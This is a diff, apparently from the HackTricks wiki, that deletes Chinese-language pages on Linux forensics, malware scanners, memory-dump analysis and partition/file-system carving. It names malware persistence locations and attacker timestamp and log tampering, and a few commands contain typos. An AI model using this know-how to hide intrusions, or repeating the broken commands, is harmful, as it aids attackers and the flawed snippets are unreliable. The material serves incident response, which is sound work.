- RedHat 用户可以使用 `rpm -qa --root=/mntpath/var/lib/rpm` 查询 RPM 数据库以列出已安装的软件包。
要发现手动安装或在这些软件包管理器之外安装的软件,探索像 _**`/usr/local`**_、_**`/opt`**_、_**`/usr/sbin`**_、_**`/usr/bin`**_、_**`/bin`**_ 和 _**`/sbin`**_ 等目录。将目录列表与特定于系统的命令结合使用,以识别与已知软件包无关的可执行文件,从而增强您对所有已安装程序的搜索。
```bash
# Debian package and log details
cat /var/lib/dpkg/status | grep -E "Package:|Status:"
cat /var/log/dpkg.log | grep installed
# RedHat RPM database query
rpm -qa --root=/mntpath/var/lib/rpm
# Listing directories for manual installations
ls /usr/sbin /usr/bin /bin /sbin
# Identifying non-package executables (Debian)
find /sbin/ -exec dpkg -S {} \; | grep "no path found"
# Identifying non-package executables (RedHat)
find /sbin/ exec rpm -qf {} \; | grep "is not"
# Find exacuable files
find / -type f -executable | grep <something>
```
## 恢复已删除的运行二进制文件
想象一个从 /tmp/exec 执行并随后被删除的进程。可以提取它。
```bash
cd /proc/3746/ #PID with the exec file deleted
head -1 maps #Get address of the file. It was 08048000-08049000
dd if=mem bs=1 skip=08048000 count=1000 of=/tmp/exec2 #Recorver it
```
## 检查自启动位置
### 计划任务
```bash
cat /var/spool/cron/crontabs/* \
/var/spool/cron/atjobs \
/var/spool/anacron \
/etc/cron* \
/etc/at* \
/etc/anacrontab \
/etc/incron.d/* \
/var/spool/incron/* \
#MacOS
ls -l /usr/lib/cron/tabs/ /Library/LaunchAgents/ /Library/LaunchDaemons/ ~/Library/LaunchAgents/
```
### 服务
恶意软件可以作为服务安装的路径:
- **/etc/inittab**: 调用初始化脚本,如 rc.sysinit进一步指向启动脚本。
- **/etc/rc.d/** 和 **/etc/rc.boot/**: 包含服务启动的脚本,后者在较旧的 Linux 版本中找到。
- **/etc/init.d/**: 在某些 Linux 版本中(如 Debian用于存储启动脚本。
- 服务也可以通过 **/etc/inetd.conf** 或 **/etc/xinetd/** 激活,具体取决于 Linux 变体。
- **/etc/systemd/system**: 系统和服务管理器脚本的目录。
- **/etc/systemd/system/multi-user.target.wants/**: 包含应在多用户运行级别启动的服务的链接。
- **/usr/local/etc/rc.d/**: 用于自定义或第三方服务。
- **\~/.config/autostart/**: 用户特定的自动启动应用程序,可以是针对用户的恶意软件的隐藏地点。
- **/lib/systemd/system/**: 安装包提供的系统范围的默认单元文件。
### 内核模块
Linux 内核模块,通常被恶意软件作为 rootkit 组件使用,在系统启动时加载。与这些模块相关的关键目录和文件包括:
- **/lib/modules/$(uname -r)**: 存放正在运行的内核版本的模块。
- **/etc/modprobe.d**: 包含控制模块加载的配置文件。
- **/etc/modprobe** 和 **/etc/modprobe.conf**: 全局模块设置的文件。
### 其他自动启动位置
Linux 使用各种文件在用户登录时自动执行程序,可能隐藏恶意软件:
- **/etc/profile.d/**\*, **/etc/profile** 和 **/etc/bash.bashrc**: 针对任何用户登录执行。
- **\~/.bashrc**, **\~/.bash_profile**, **\~/.profile** 和 **\~/.config/autostart**: 用户特定的文件,在他们登录时运行。
- **/etc/rc.local**: 在所有系统服务启动后运行,标志着过渡到多用户环境的结束。
## 检查日志
Linux 系统通过各种日志文件跟踪用户活动和系统事件。这些日志对于识别未经授权的访问、恶意软件感染和其他安全事件至关重要。关键日志文件包括:
- **/var/log/syslog** (Debian) 或 **/var/log/messages** (RedHat): 捕获系统范围的消息和活动。
- **/var/log/auth.log** (Debian) 或 **/var/log/secure** (RedHat): 记录身份验证尝试、成功和失败的登录。
- 使用 `grep -iE "session opened for|accepted password|new session|not in sudoers" /var/log/auth.log` 过滤相关的身份验证事件。
- **/var/log/boot.log**: 包含系统启动消息。
- **/var/log/maillog** 或 **/var/log/mail.log**: 记录邮件服务器活动,有助于跟踪与邮件相关的服务。
- **/var/log/kern.log**: 存储内核消息,包括错误和警告。
- **/var/log/dmesg**: 保存设备驱动程序消息。
- **/var/log/faillog**: 记录失败的登录尝试,有助于安全漏洞调查。
- **/var/log/cron**: 记录 cron 作业执行。
- **/var/log/daemon.log**: 跟踪后台服务活动。
- **/var/log/btmp**: 记录失败的登录尝试。
- **/var/log/httpd/**: 包含 Apache HTTPD 错误和访问日志。
- **/var/log/mysqld.log** 或 **/var/log/mysql.log**: 记录 MySQL 数据库活动。
- **/var/log/xferlog**: 记录 FTP 文件传输。
- **/var/log/**: 始终检查此处是否有意外日志。
> [!NOTE]
> Linux 系统日志和审计子系统可能在入侵或恶意软件事件中被禁用或删除。因为 Linux 系统上的日志通常包含有关恶意活动的一些最有用的信息,入侵者经常删除它们。因此,在检查可用日志文件时,重要的是查找可能表明删除或篡改的间隙或无序条目。
**Linux 为每个用户维护命令历史**,存储在:
- \~/.bash_history
- \~/.zsh_history
- \~/.zsh_sessions/\*
- \~/.python_history
- \~/.\*\_history
此外,`last -Faiwx` 命令提供用户登录的列表。检查是否有未知或意外的登录。
检查可以授予额外权限的文件:
- 审查 `/etc/sudoers` 以查找可能被授予的意外用户权限。
- 审查 `/etc/sudoers.d/` 以查找可能被授予的意外用户权限。
- 检查 `/etc/groups` 以识别任何异常的组成员资格或权限。
- 检查 `/etc/passwd` 以识别任何异常的组成员资格或权限。
一些应用程序也会生成自己的日志:
- **SSH**: 检查 _\~/.ssh/authorized_keys_ 和 _\~/.ssh/known_hosts_ 以查找未经授权的远程连接。
- **Gnome 桌面**: 查看 _\~/.recently-used.xbel_ 以查找通过 Gnome 应用程序访问的最近文件。
- **Firefox/Chrome**: 检查 _\~/.mozilla/firefox__\~/.config/google-chrome_ 中的浏览器历史和下载,以查找可疑活动。
- **VIM**: 检查 _\~/.viminfo_ 以获取使用详情,例如访问的文件路径和搜索历史。
- **Open Office**: 检查最近的文档访问,以指示可能被破坏的文件。
- **FTP/SFTP**: 检查 _\~/.ftp_history_ 或 _\~/.sftp_history_ 中的日志,以查找可能未经授权的文件传输。
- **MySQL**: 检查 _\~/.mysql_history_ 以调查执行的 MySQL 查询,可能揭示未经授权的数据库活动。
- **Less**: 分析 _\~/.lesshst_ 以获取使用历史,包括查看的文件和执行的命令。
- **Git**: 检查 _\~/.gitconfig_ 和项目 _.git/logs_ 以查找对存储库的更改。
### USB 日志
[**usbrip**](https://github.com/snovvcrash/usbrip) 是一个用纯 Python 3 编写的小软件,它解析 Linux 日志文件(`/var/log/syslog*``/var/log/messages*`,具体取决于发行版),以构建 USB 事件历史表。
了解**所有使用过的 USB** 是很有趣的,如果你有一个授权的 USB 列表来查找“违规事件”(使用不在该列表中的 USB将更有用。
### 安装
```bash
pip3 install usbrip
usbrip ids download #Download USB ID database
```
### 示例
```bash
usbrip events history #Get USB history of your curent linux machine
usbrip events history --pid 0002 --vid 0e0f --user kali #Search by pid OR vid OR user
#Search for vid and/or pid
usbrip ids download #Downlaod database
usbrip ids search --pid 0002 --vid 0e0f #Search for pid AND vid
```
更多示例和信息请查看 GitHub: [https://github.com/snovvcrash/usbrip](https://github.com/snovvcrash/usbrip)
## 审查用户账户和登录活动
检查 _**/etc/passwd**_、_**/etc/shadow**_ 和 **安全日志**,寻找不寻常的名称或在已知未授权事件附近创建和使用的账户。同时,检查可能的 sudo 暴力攻击。\
此外,检查像 _**/etc/sudoers**__**/etc/groups**_ 这样的文件,查看是否有意外的权限授予给用户。\
最后,查找 **没有密码****容易猜测** 的密码的账户。
## 检查文件系统
### 在恶意软件调查中分析文件系统结构
在调查恶意软件事件时,文件系统的结构是一个重要的信息来源,揭示事件的顺序和恶意软件的内容。然而,恶意软件作者正在开发技术来阻碍这种分析,例如修改文件时间戳或避免使用文件系统进行数据存储。
为了对抗这些反取证方法,至关重要的是:
- **进行彻底的时间线分析**,使用像 **Autopsy** 这样的工具可视化事件时间线,或使用 **Sleuth Kit**`mactime` 获取详细的时间线数据。
- **调查系统 $PATH 中的意外脚本**,这些脚本可能包括攻击者使用的 shell 或 PHP 脚本。
- **检查 `/dev` 中的非典型文件**,因为它通常包含特殊文件,但可能包含与恶意软件相关的文件。
- **搜索隐藏的文件或目录**,名称可能像 ".. "(点点空格)或 "..^G"(点点控制-G这些可能隐藏恶意内容。
- **识别 setuid root 文件**,使用命令:`find / -user root -perm -04000 -print` 这将找到具有提升权限的文件,可能被攻击者滥用。
- **检查 inode 表中的删除时间戳**,以发现大规模文件删除,可能表明存在 rootkit 或木马。
- **在识别到一个恶意文件后,检查连续的 inode**,因为它们可能被放置在一起。
- **检查常见的二进制目录** (_/bin_、_/sbin_) 中最近修改的文件,因为这些可能被恶意软件更改。
````bash
# List recent files in a directory:
ls -laR --sort=time /bin```
# Sort files in a directory by inode:
ls -lai /bin | sort -n```
````
> [!NOTE]
> 请注意,**攻击者**可以**修改**时间以使**文件看起来**是**合法的**,但他**无法**修改**inode**。如果你发现一个**文件**显示它在与同一文件夹中其他文件**相同的时间**被创建和修改,但**inode**却**意外地更大**,那么该**文件的时间戳被修改**了。
## 比较不同文件系统版本的文件
### 文件系统版本比较摘要
要比较文件系统版本并确定更改,我们使用简化的`git diff`命令:
- **要查找新文件**,比较两个目录:
```bash
git diff --no-index --diff-filter=A path/to/old_version/ path/to/new_version/
```
- **对于修改过的内容**,列出更改,同时忽略特定行:
```bash
git diff --no-index --diff-filter=M path/to/old_version/ path/to/new_version/ | grep -E "^\+" | grep -v "Installed-Time"
```
- **检测已删除文件**:
```bash
git diff --no-index --diff-filter=D path/to/old_version/ path/to/new_version/
```
- **过滤选项** (`--diff-filter`) 有助于缩小到特定的更改,如添加的 (`A`)、删除的 (`D`) 或修改的 (`M`) 文件。
- `A`: 添加的文件
- `C`: 复制的文件
- `D`: 删除的文件
- `M`: 修改的文件
- `R`: 重命名的文件
- `T`: 类型更改(例如,从文件到符号链接)
- `U`: 未合并的文件
- `X`: 未知的文件
- `B`: 损坏的文件
## 参考文献
- [https://cdn.ttgtmedia.com/rms/security/Malware%20Forensics%20Field%20Guide%20for%20Linux%20Systems_Ch3.pdf](https://cdn.ttgtmedia.com/rms/security/Malware%20Forensics%20Field%20Guide%20for%20Linux%20Systems_Ch3.pdf)
- [https://www.plesk.com/blog/featured/linux-logs-explained/](https://www.plesk.com/blog/featured/linux-logs-explained/)
- [https://git-scm.com/docs/git-diff#Documentation/git-diff.txt---diff-filterACDMRTUXB82308203](https://git-scm.com/docs/git-diff#Documentation/git-diff.txt---diff-filterACDMRTUXB82308203)
- **书籍Linux系统的恶意软件取证实用指南数字取证实用指南**
{{#include ../../banners/hacktricks-training.md}}

154
src/forensics/basic-forensic-methodology/malware-analysis.md
View File

@ -1,154 +0,0 @@
# 恶意软件分析
{{#include ../../banners/hacktricks-training.md}}
## 取证备忘单
[https://www.jaiminton.com/cheatsheet/DFIR/#](https://www.jaiminton.com/cheatsheet/DFIR/)
## 在线服务
- [VirusTotal](https://www.virustotal.com/gui/home/upload)
- [HybridAnalysis](https://www.hybrid-analysis.com)
- [Koodous](https://koodous.com)
- [Intezer](https://analyze.intezer.com)
- [Any.Run](https://any.run/)
## 离线杀毒和检测工具
### Yara
#### 安装
```bash
sudo apt-get install -y yara
```
#### 准备规则
使用此脚本从github下载并合并所有yara恶意软件规则: [https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9](https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9)\
创建_**rules**_目录并执行它。这将创建一个名为_**malware_rules.yar**_的文件其中包含所有恶意软件的yara规则。
```bash
wget https://gist.githubusercontent.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9/raw/4ec711d37f1b428b63bed1f786b26a0654aa2f31/malware_yara_rules.py
mkdir rules
python malware_yara_rules.py
```
#### 扫描
```bash
yara -w malware_rules.yar image #Scan 1 file
yara -w malware_rules.yar folder #Scan the whole folder
```
#### YaraGen: 检查恶意软件并创建规则
您可以使用工具 [**YaraGen**](https://github.com/Neo23x0/yarGen) 从二进制文件生成 yara 规则。查看这些教程: [**第 1 部分**](https://www.nextron-systems.com/2015/02/16/write-simple-sound-yara-rules/), [**第 2 部分**](https://www.nextron-systems.com/2015/10/17/how-to-write-simple-but-sound-yara-rules-part-2/), [**第 3 部分**](https://www.nextron-systems.com/2016/04/15/how-to-write-simple-but-sound-yara-rules-part-3/)
```bash
python3 yarGen.py --update
python3.exe yarGen.py --excludegood -m ../../mals/
```
### ClamAV
#### 安装
```
sudo apt-get install -y clamav
```
#### 扫描
```bash
sudo freshclam #Update rules
clamscan filepath #Scan 1 file
clamscan folderpath #Scan the whole folder
```
### [Capa](https://github.com/mandiant/capa)
**Capa** 检测可疑的 **能力** 在可执行文件中PE, ELF, .NET。因此它会找到诸如 Att\&ck 策略或可疑能力,例如:
- 检查 OutputDebugString 错误
- 作为服务运行
- 创建进程
在 [**Github repo**](https://github.com/mandiant/capa) 中获取它。
### IOCs
IOC 代表妥协指标。IOC 是一组 **条件,用于识别** 一些潜在的不需要的软件或确认的 **恶意软件**。蓝队使用这种定义来 **搜索这种恶意文件** 在他们的 **系统****网络** 中。\
共享这些定义非常有用,因为当恶意软件在计算机中被识别并为该恶意软件创建 IOC 时,其他蓝队可以使用它更快地识别恶意软件。
创建或修改 IOC 的工具是 [**IOC Editor**](https://www.fireeye.com/services/freeware/ioc-editor.html)**.**\
您可以使用 [**Redline**](https://www.fireeye.com/services/freeware/redline.html) 等工具来 **搜索设备中的定义 IOC**
### Loki
[**Loki**](https://github.com/Neo23x0/Loki) 是一个简单妥协指标的扫描器。\
检测基于四种检测方法:
```
1. File Name IOC
Regex match on full file path/name
2. Yara Rule Check
Yara signature matches on file data and process memory
3. Hash Check
Compares known malicious hashes (MD5, SHA1, SHA256) with scanned files
4. C2 Back Connect Check
Compares process connection endpoints with C2 IOCs (new since version v.10)
```
### Linux Malware Detect
[**Linux Malware Detect (LMD)**](https://www.rfxn.com/projects/linux-malware-detect/) 是一个针对Linux的恶意软件扫描器发布于GNU GPLv2许可证旨在应对共享托管环境中的威胁。它使用来自网络边缘入侵检测系统的威胁数据提取正在攻击中积极使用的恶意软件并生成检测签名。此外威胁数据还来自用户提交的LMD结账功能和恶意软件社区资源。
### rkhunter
像[**rkhunter**](http://rkhunter.sourceforge.net)这样的工具可以用来检查文件系统中可能存在的**rootkits**和恶意软件。
```bash
sudo ./rkhunter --check -r / -l /tmp/rkhunter.log [--report-warnings-only] [--skip-keypress]
```
### FLOSS
[**FLOSS**](https://github.com/mandiant/flare-floss) 是一个工具,尝试使用不同的技术在可执行文件中查找混淆字符串。
### PEpper
[PEpper ](https://github.com/Th3Hurrican3/PEpper) 检查可执行文件中的一些基本内容二进制数据、熵、URLs 和 IPs一些 yara 规则)。
### PEstudio
[PEstudio](https://www.winitor.com/download) 是一个工具,可以获取 Windows 可执行文件的信息,例如导入、导出、头部,但也会检查病毒总数并找到潜在的 Att\&ck 技术。
### Detect It Easy(DiE)
[**DiE**](https://github.com/horsicq/Detect-It-Easy/) 是一个工具,用于检测文件是否被 **加密**,并找到 **打包器**
### NeoPI
[**NeoPI** ](https://github.com/CiscoCXSecurity/NeoPI) 是一个 Python 脚本,使用多种 **统计方法** 检测文本/脚本文件中的 **混淆****加密** 内容。NeoPI 的预期目的是帮助 **检测隐藏的 web shell 代码**
### **php-malware-finder**
[**PHP-malware-finder**](https://github.com/nbs-system/php-malware-finder) 尽力检测 **混淆**/**可疑代码** 以及使用 **PHP** 函数的文件,这些函数通常用于 **恶意软件**/webshells。
### Apple Binary Signatures
在检查某些 **恶意软件样本** 时,您应该始终 **检查二进制文件的签名**,因为签名的 **开发者** 可能已经与 **恶意软件** **相关**
```bash
#Get signer
codesign -vv -d /bin/ls 2>&1 | grep -E "Authority|TeamIdentifier"
#Check if the apps contents have been modified
codesign --verify --verbose /Applications/Safari.app
#Check if the signature is valid
spctl --assess --verbose /Applications/Safari.app
```
## 检测技术
### 文件堆叠
如果你知道某个包含**文件**的文件夹**最后更新于某个日期**。**检查**所有**文件**在**web 服务器**中的**创建和修改日期**,如果有任何日期是**可疑的**,检查该文件。
### 基线
如果一个文件夹的文件**不应该被修改**,你可以计算该文件夹**原始文件**的**哈希**值,并与**当前**文件进行**比较**。任何被修改的文件都将是**可疑的**。
### 统计分析
当信息保存在日志中时,你可以**检查统计数据比如每个web服务器的文件被访问的次数因为web shell可能是其中之一**。
{{#include ../../banners/hacktricks-training.md}}

37
src/forensics/basic-forensic-methodology/memory-dump-analysis/README.md
View File

@ -1,37 +0,0 @@
# 内存转储分析
{{#include ../../../banners/hacktricks-training.md}}
## 开始
开始**搜索**pcap中的**恶意软件**。使用在[**恶意软件分析**](../malware-analysis.md)中提到的**工具**。
## [Volatility](../../../generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/volatility-cheatsheet.md)
**Volatility是内存转储分析的主要开源框架**。这个Python工具分析来自外部源或VMware虚拟机的转储基于转储的操作系统配置文件识别数据如进程和密码。它可以通过插件扩展使其在取证调查中非常灵活。
**[在这里找到备忘单](../../../generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/volatility-cheatsheet.md)**
## 小型转储崩溃报告
当转储很小只有几KB也许几MB它可能是小型转储崩溃报告而不是内存转储。
![](<../../../images/image (216).png>)
如果您安装了Visual Studio可以打开此文件并绑定一些基本信息如进程名称、架构、异常信息和正在执行的模块
![](<../../../images/image (217).png>)
您还可以加载异常并查看反编译的指令
![](<../../../images/image (219).png>)
![](<../../../images/image (218) (1).png>)
无论如何Visual Studio并不是执行转储深度分析的最佳工具。
您应该使用**IDA**或**Radare**来**深入**检查它。
{{#include ../../../banners/hacktricks-training.md}}

234
src/forensics/basic-forensic-methodology/partitions-file-systems-carving/README.md
View File

@ -1,234 +0,0 @@
# 分区/文件系统/雕刻
{{#include ../../../banners/hacktricks-training.md}}
## 分区
硬盘或**SSD磁盘可以包含不同的分区**,目的是物理上分隔数据。\
磁盘的**最小**单位是**扇区**通常由512B组成。因此每个分区的大小需要是该大小的倍数。
### MBR主引导记录
它分配在**引导代码后的第一个扇区的446B**。这个扇区对于指示PC应该从哪里挂载分区至关重要。\
它最多允许**4个分区**(最多**只有1个**可以是活动的/**可引导的**)。但是,如果需要更多分区,可以使用**扩展分区**。这个第一个扇区的**最后一个字节**是引导记录签名**0x55AA**。只能标记一个分区为活动。\
MBR允许**最大2.2TB**。
![](<../../../images/image (489).png>)
![](<../../../images/image (490).png>)
从MBR的**440到443字节**可以找到**Windows磁盘签名**如果使用Windows。硬盘的逻辑驱动器字母取决于Windows磁盘签名。更改此签名可能会导致Windows无法启动工具[**Active Disk Editor**](https://www.disk-editor.org/index.html)****。
![](<../../../images/image (493).png>)
**格式**
| 偏移 | 长度 | 项目 |
| ----------- | ---------- | ------------------- |
| 0 (0x00) | 446(0x1BE) | 引导代码 |
| 446 (0x1BE) | 16 (0x10) | 第一个分区 |
| 462 (0x1CE) | 16 (0x10) | 第二个分区 |
| 478 (0x1DE) | 16 (0x10) | 第三个分区 |
| 494 (0x1EE) | 16 (0x10) | 第四个分区 |
| 510 (0x1FE) | 2 (0x2) | 签名 0x55 0xAA |
**分区记录格式**
| 偏移 | 长度 | 项目 |
| --------- | -------- | ------------------------------------------------------ |
| 0 (0x00) | 1 (0x01) | 活动标志 (0x80 = 可引导) |
| 1 (0x01) | 1 (0x01) | 起始磁头 |
| 2 (0x02) | 1 (0x01) | 起始扇区位0-5气缸的高位6-7 |
| 3 (0x03) | 1 (0x01) | 起始气缸最低8位 |
| 4 (0x04) | 1 (0x01) | 分区类型代码0x83 = Linux |
| 5 (0x05) | 1 (0x01) | 结束磁头 |
| 6 (0x06) | 1 (0x01) | 结束扇区位0-5气缸的高位6-7 |
| 7 (0x07) | 1 (0x01) | 结束气缸最低8位 |
| 8 (0x08) | 4 (0x04) | 分区前的扇区(小端) |
| 12 (0x0C) | 4 (0x04) | 分区中的扇区 |
为了在Linux中挂载MBR您首先需要获取起始偏移量可以使用`fdisk``p`命令)
![](<../../../images/image (413) (3) (3) (3) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (12).png>)
然后使用以下代码
```bash
#Mount MBR in Linux
mount -o ro,loop,offset=<Bytes>
#63x512 = 32256Bytes
mount -o ro,loop,offset=32256,noatime /path/to/image.dd /media/part/
```
**LBA (逻辑块寻址)**
**逻辑块寻址** (**LBA**) 是一种常用的方案,用于**指定存储在计算机存储设备上的数据块的位置**通常是硬盘驱动器等二级存储系统。LBA 是一种特别简单的线性寻址方案;**块通过整数索引定位**,第一个块为 LBA 0第二个为 LBA 1依此类推。
### GPT (GUID 分区表)
GUID 分区表,称为 GPT因其相较于 MBR主引导记录的增强能力而受到青睐。GPT 在多个方面具有独特性:
- **位置和大小**GPT 和 MBR 都从**扇区 0** 开始。然而GPT 采用**64位**,与 MBR 的 32位形成对比。
- **分区限制**GPT 在 Windows 系统上支持最多**128个分区**,并可容纳最多**9.4ZB**的数据。
- **分区名称**:提供最多 36 个 Unicode 字符的分区命名能力。
**数据弹性和恢复**
- **冗余**:与 MBR 不同GPT 不将分区和引导数据限制在一个地方。它在磁盘上复制这些数据,从而增强数据完整性和弹性。
- **循环冗余检查 (CRC)**GPT 使用 CRC 确保数据完整性。它主动监控数据损坏,并在检测到时,尝试从另一个磁盘位置恢复损坏的数据。
**保护性 MBR (LBA0)**
- GPT 通过保护性 MBR 维持向后兼容性。此功能位于传统 MBR 空间中,但旨在防止较旧的基于 MBR 的工具错误地覆盖 GPT 磁盘,从而保护 GPT 格式磁盘上的数据完整性。
![https://upload.wikimedia.org/wikipedia/commons/thumb/0/07/GUID_Partition_Table_Scheme.svg/800px-GUID_Partition_Table_Scheme.svg.png](<../../../images/image (491).png>)
**混合 MBR (LBA 0 + GPT)**
[来自维基百科](https://en.wikipedia.org/wiki/GUID_Partition_Table)
在支持**通过 BIOS** 服务而非 EFI 的**基于 GPT 的引导**的操作系统中,第一个扇区仍然可以用于存储**引导加载程序**代码的第一阶段,但**经过修改**以识别**GPT** **分区**。MBR 中的引导加载程序不得假设扇区大小为 512 字节。
**分区表头 (LBA 1)**
[来自维基百科](https://en.wikipedia.org/wiki/GUID_Partition_Table)
分区表头定义了磁盘上可用的块。它还定义了构成分区表的分区条目的数量和大小(表中的偏移量 80 和 84
| 偏移量 | 长度 | 内容 |
| --------- | -------- | ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
| 0 (0x00) | 8 字节 | 签名 ("EFI PART", 45h 46h 49h 20h 50h 41h 52h 54h 或 0x5452415020494645ULL[ ](https://en.wikipedia.org/wiki/GUID_Partition_Table#cite_note-8) 在小端机器上) |
| 8 (0x08) | 4 字节 | 版本 1.0 (00h 00h 01h 00h) 适用于 UEFI 2.8 |
| 12 (0x0C) | 4 字节 | 小端的头大小(以字节为单位,通常为 5Ch 00h 00h 00h 或 92 字节) |
| 16 (0x10) | 4 字节 | [CRC32](https://en.wikipedia.org/wiki/CRC32) 的头(偏移量 +0 到头大小)的小端,计算时此字段为零 |
| 20 (0x14) | 4 字节 | 保留;必须为零 |
| 24 (0x18) | 8 字节 | 当前 LBA此头副本的位置 |
| 32 (0x20) | 8 字节 | 备份 LBA另一个头副本的位置 |
| 40 (0x28) | 8 字节 | 分区的第一个可用 LBA主分区表最后 LBA + 1 |
| 48 (0x30) | 8 字节 | 最后可用 LBA辅助分区表第一个 LBA 1 |
| 56 (0x38) | 16 字节 | 磁盘 GUID 的混合字节序 |
| 72 (0x48) | 8 字节 | 分区条目数组的起始 LBA主副本中始终为 2 |
| 80 (0x50) | 4 字节 | 数组中分区条目的数量 |
| 84 (0x54) | 4 字节 | 单个分区条目的大小(通常为 80h 或 128 |
| 88 (0x58) | 4 字节 | 分区条目数组的 CRC32 小端 |
| 92 (0x5C) | \* | 保留;对于块的其余部分必须为零(对于 512 字节的扇区大小为 420 字节;但对于更大的扇区大小可以更多) |
**分区条目 (LBA 233)**
| GUID 分区条目格式 | | |
| --------------------------- | -------- | ------------------------------------------------------------------------------------------------------------- |
| 偏移量 | 长度 | 内容 |
| 0 (0x00) | 16 字节 | [分区类型 GUID](https://en.wikipedia.org/wiki/GUID_Partition_Table#Partition_type_GUIDs)(混合字节序) |
| 16 (0x10) | 16 字节 | 唯一分区 GUID混合字节序 |
| 32 (0x20) | 8 字节 | 第一个 LBA[小端](https://en.wikipedia.org/wiki/Little_endian) |
| 40 (0x28) | 8 字节 | 最后 LBA包含通常为奇数 |
| 48 (0x30) | 8 字节 | 属性标志(例如,位 60 表示只读) |
| 56 (0x38) | 72 字节 | 分区名称36 [UTF-16](https://en.wikipedia.org/wiki/UTF-16)LE 代码单元) |
**分区类型**
![](<../../../images/image (492).png>)
更多分区类型请见 [https://en.wikipedia.org/wiki/GUID_Partition_Table](https://en.wikipedia.org/wiki/GUID_Partition_Table)
### 检查
在使用 [**ArsenalImageMounter**](https://arsenalrecon.com/downloads/) 挂载取证镜像后,可以使用 Windows 工具 [**Active Disk Editor**](https://www.disk-editor.org/index.html)** 检查第一个扇区**。在下图中,在**扇区 0** 检测到一个 **MBR** 并进行了解释:
![](<../../../images/image (494).png>)
如果是**GPT 表而不是 MBR**,则应在**扇区 1** 中出现签名 _EFI PART_(在前面的图像中是空的)。
## 文件系统
### Windows 文件系统列表
- **FAT12/16**: MSDOS, WIN95/98/NT/200
- **FAT32**: 95/2000/XP/2003/VISTA/7/8/10
- **ExFAT**: 2008/2012/2016/VISTA/7/8/10
- **NTFS**: XP/2003/2008/2012/VISTA/7/8/10
- **ReFS**: 2012/2016
### FAT
**FAT (文件分配表)** 文件系统围绕其核心组件——文件分配表设计,该表位于卷的开始。该系统通过维护**两个副本**的表来保护数据,确保即使一个损坏也能保持数据完整性。该表及根文件夹必须位于**固定位置**,这对系统的启动过程至关重要。
文件系统的基本存储单位是**簇,通常为 512B**由多个扇区组成。FAT 通过版本演变:
- **FAT12**,支持 12 位簇地址,处理最多 4078 个簇(与 UNIX 一起为 4084
- **FAT16**,增强为 16 位地址,从而容纳最多 65,517 个簇。
- **FAT32**,进一步发展为 32 位地址,允许每个卷最多 268,435,456 个簇。
所有 FAT 版本的一个显著限制是**最大文件大小为 4GB**,这是由于用于文件大小存储的 32 位字段所致。
根目录的关键组件,特别是对于 FAT12 和 FAT16包括
- **文件/文件夹名称**(最多 8 个字符)
- **属性**
- **创建、修改和最后访问日期**
- **FAT 表地址**(指示文件的起始簇)
- **文件大小**
### EXT
**Ext2** 是最常见的**非日志**分区(**不经常更改的分区**)的文件系统,如引导分区。**Ext3/4** 是**日志**文件系统,通常用于**其余分区**。
## **元数据**
某些文件包含元数据。这些信息是关于文件内容的,有时对分析师可能很有趣,因为根据文件类型,它可能包含如下信息:
- 标题
- 使用的 MS Office 版本
- 作者
- 创建和最后修改日期
- 相机型号
- GPS 坐标
- 图像信息
您可以使用 [**exiftool**](https://exiftool.org) 和 [**Metadiver**](https://www.easymetadata.com/metadiver-2/) 等工具获取文件的元数据。
## **已删除文件恢复**
### 记录的已删除文件
如前所述,有几个地方在文件被“删除”后仍然保存该文件。这是因为通常从文件系统中删除文件只是将其标记为已删除,但数据并未被触及。因此,可以检查文件的注册表(如 MFT并找到已删除的文件。
此外,操作系统通常会保存大量关于文件系统更改和备份的信息,因此可以尝试使用它们来恢复文件或尽可能多的信息。
{{#ref}}
file-data-carving-recovery-tools.md
{{#endref}}
### **文件雕刻**
**文件雕刻**是一种尝试在**大量数据中查找文件**的技术。此类工具的主要工作方式有三种:**基于文件类型的头和尾**、基于文件类型的**结构**和基于**内容**本身。
请注意,这种技术**无法检索碎片化的文件**。如果文件**未存储在连续的扇区中**,则此技术将无法找到它,或至少无法找到其部分。
您可以使用多种工具进行文件雕刻,指明您要搜索的文件类型。
{{#ref}}
file-data-carving-recovery-tools.md
{{#endref}}
### 数据流 **C**arving
数据流雕刻类似于文件雕刻,但**不是查找完整文件,而是查找有趣的信息片段**。\
例如,代替查找包含记录的 URL 的完整文件,此技术将搜索 URL。
{{#ref}}
file-data-carving-recovery-tools.md
{{#endref}}
### 安全删除
显然,有方法可以**“安全地”删除文件及其部分日志**。例如,可以**多次用垃圾数据覆盖**文件的内容,然后**删除**关于该文件的**$MFT** 和 **$LOGFILE** 中的**日志**,并**删除卷影副本**。\
您可能会注意到,即使执行该操作,仍可能有**其他部分记录了文件的存在**,这确实是事实,取证专业人员的工作之一就是找到它们。
## 参考文献
- [https://en.wikipedia.org/wiki/GUID_Partition_Table](https://en.wikipedia.org/wiki/GUID_Partition_Table)
- [http://ntfs.com/ntfs-permissions.htm](http://ntfs.com/ntfs-permissions.htm)
- [https://www.osforensics.com/faqs-and-tutorials/how-to-scan-ntfs-i30-entries-deleted-files.html](https://www.osforensics.com/faqs-and-tutorials/how-to-scan-ntfs-i30-entries-deleted-files.html)
- [https://docs.microsoft.com/en-us/windows-server/storage/file-server/volume-shadow-copy-service](https://docs.microsoft.com/en-us/windows-server/storage/file-server/volume-shadow-copy-service)
- **iHackLabs 认证数字取证 Windows**
{{#include ../../../banners/hacktricks-training.md}}

87
src/forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md
View File

@ -1,87 +0,0 @@
# 文件/数据雕刻与恢复工具
{{#include ../../../banners/hacktricks-training.md}}
## 雕刻与恢复工具
更多工具在 [https://github.com/Claudio-C/awesome-datarecovery](https://github.com/Claudio-C/awesome-datarecovery)
### Autopsy
在取证中提取图像文件的最常用工具是 [**Autopsy**](https://www.autopsy.com/download/)。下载并安装它然后让它处理文件以查找“隐藏”文件。请注意Autopsy 是为支持磁盘映像和其他类型的映像而构建的,但不支持简单文件。
### Binwalk <a href="#binwalk" id="binwalk"></a>
